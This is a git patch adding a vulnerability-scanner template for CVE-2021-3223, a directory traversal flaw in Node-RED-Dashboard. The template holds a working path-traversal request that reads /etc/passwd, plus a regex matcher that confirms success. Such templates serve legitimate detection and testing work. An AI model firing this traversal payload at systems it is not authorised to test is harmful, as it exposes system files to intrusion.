From e7bb4bff237efb557c3e8a56f4c6096f0ed35d2a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 24 Jun 2021 21:07:17 +0900 Subject: [PATCH] Create CVE-2021-3223.yaml Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-3223.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2021/CVE-2021-3223.yaml diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml new file mode 100644 index 0000000000..6974cdba27 --- /dev/null +++ b/cves/2021/CVE-2021-3223.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-3223 + +info: + name: Node RED Dashboard - Directory Traversal + author: gy741 + severity: high + description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. + reference: | + - https://github.com/node-red/node-red-dashboard/issues/669 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 + tags: cve,cve2020,node-red-dashboard,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:"